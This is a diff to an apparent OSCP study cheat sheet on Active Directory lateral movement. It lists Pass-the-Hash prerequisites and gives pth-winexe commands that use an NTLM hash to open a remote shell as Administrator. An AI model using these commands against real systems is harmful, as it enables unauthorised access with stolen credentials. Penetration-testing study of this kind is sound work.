brianlam38/OSCP-2022/cheatsheet-activedirectory.md

 ## AD Lateral Movement

 Pass-the-Hash
+* Requires pw-hash user to have local admin rights on target, as connection is made using the `Admin$` share.
 * Requires SMB connection through the firewall
 * Requires Windows File and Print Sharing feature to be enabled.
-* Requires local admin permissions, as connection is made using the `Admin$` share.
 ```
 $ pth-winexe -U [username]%[password_hash] //[target] [command_to_exec]
 $ pth-winexe -U Administrator%NTLMhash //10.1.1.1 cmd